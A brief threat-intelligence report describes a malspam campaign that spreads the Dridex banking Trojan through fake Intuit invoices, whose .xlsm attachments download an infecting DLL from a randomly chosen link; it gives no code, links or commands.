The .jar attachment downloads the malware. This is a Trojan, capable of stealing credentials and loading additional malicious payloads into the victim's PC.
Technical analysis by the Malware Hunter JAMESWT
New malspam campaign to convey Dridex with Intuit and a false invoice as baits. The the e-mails attachments, .xlsm documents, contact a link chosen randomly from an internal list. This download a DLL that starts the malware infection
Dridex is still hiding behind Intuit in a new cybercrime malspam campaign. Some emails in the wild are using the company and attached false invoices as baits. It is an .xlsm document which, if opened, contacts a malicious link chosen randomly from a list within it. This then downloads a DLL which infects the computer with the malware. Dridex is a very dangerous banking Trojan used by cybercrime, which has long been the protagonist of campaigns all over the world, especially with a courier theme. The targets are mainly companies, but not only.
The malicious mail detected by cocaman
The image of the fake Intuit invoice
The internal list from which the attachment chooses randomly the link to download the DLL and infect the machine with the malware